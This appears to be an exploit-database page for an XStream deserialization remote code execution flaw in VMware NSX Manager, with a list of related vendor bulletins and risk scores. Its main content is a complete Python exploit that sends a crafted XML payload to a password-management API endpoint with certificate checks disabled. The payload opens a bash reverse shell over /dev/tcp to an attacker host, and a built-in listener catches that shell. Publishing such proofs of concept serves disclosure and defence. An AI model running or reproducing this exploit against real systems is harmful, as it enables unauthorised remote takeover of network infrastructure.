SRC-2022-0021 : VMWare Cloud Foundation NSX-V XStream Deserialization of Untrusted Data Remote Code Execution Vulnerability

🗓️ 03 Aug 2022 00:00:00Reported by Sina Kheirkhah and Steven Seeley of Source InciteType

Vulnerability in VMWare Cloud Foundation NSX-V XStream Deserializatio

Reporter	Title	Published	Views	Family All 144
IBM Security Bulletins	Security Bulletin: Vulnerabilities in XStream affect IBM Spectrum Copy Data Management	11 Dec 202100:37	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Sterling B2B Integrator is vulnerable to multiple vulnerabilities due to Xstream	13 May 202214:58	–	ibm
IBM Security Bulletins	Security Bulletin: Atlas eDiscovery Process Management is affected by a vulnerable xstream-1.4.17.jar	8 May 202308:40	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in XStream affect IBM Spectrum Protect Plus	10 Dec 202120:38	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in XStream	1 Oct 202106:19	–	ibm
IBM Security Bulletins	Security Bulletin: IBM InfoSphere Information Server is affected by multiple vulnerabilities in XStream	27 Apr 202223:05	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Spectrum Control is vulnerable to multiple weaknesses related to XStream, Apache Xerces2, Jackson, OpenSSL, and Java SE	26 May 202207:31	–	ibm
IBM Security Bulletins	Security Bulletin: Due to use of XStream, IBM Tivoli Netcool Configuration Manager is vulnerable to arbitrary code execution attack	24 Jan 202314:30	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities including a remote code execution in Spring Framework (CVE-2022-22965)	11 Apr 202215:17	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Verify Governance is vulnerable to multiple security threats due to use of XStream	22 Nov 202216:29	–	ibm

#!/usr/bin/env python3
"""
VMWare NSX Manager XStream Deserialization of Untrusted Data Remote Code Execution Vulnerability
Version: 6.4.13-19307994
File: VMware-NSX-Manager-6.4.13-19307994-disk1.vmdk
SHA1: f828eccd50d5f32500fb1f7a989d02bddf705c45
Found by: Sina Kheirkhah of MDSec and Steven Seeley of Source Incite
"""

import socket
import sys
import requests
from telnetlib import Telnet
from threading import Thread
from urllib3 import disable_warnings, exceptions
disable_warnings(exceptions.InsecureRequestWarning)

xstream = """foojava.lang.Comparablebash-cbash -i >& /dev/tcp/{rhost}/{rport} 0>&1start"""

def handler(lp):
    print(f"(+) starting handler on port {lp}")
    t = Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print(f"(+) connection from {addr[0]}")
    t.sock = conn
    print("(+) pop thy shell!")
    t.interact()

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"(+) usage: {sys.argv[0]}")
        print(f"(+) eg: {sys.argv[0]} 192.168.18.135 172.18.182.204:1234")
        sys.exit(1)
    target = sys.argv[1]
    rhost  = sys.argv[2]
    rport  = 1234
    if ":" in sys.argv[2]:
        assert sys.argv[2].split(":")[1].isdigit(), "(-) didnt supply a valid port"
        rport = int(sys.argv[2].split(":")[1])
        rhost = sys.argv[2].split(":")[0]
    handlerthr = Thread(target=handler, args=[rport])
    handlerthr.start()
    # trigger rce
    requests.put(
        f"https://{target}/api/2.0/services/usermgmt/password/1337", 
        data=xstream.format(rhost=rhost, rport=rport), 
        headers={
            'Content-Type': 'application/xml'
        }, 
        verify=False
    )

26 Oct 2022 00:00Current

9High risk

Vulners AI Score9

CVSS 26

CVSS 3.18.5

EPSS0.94255

SSVC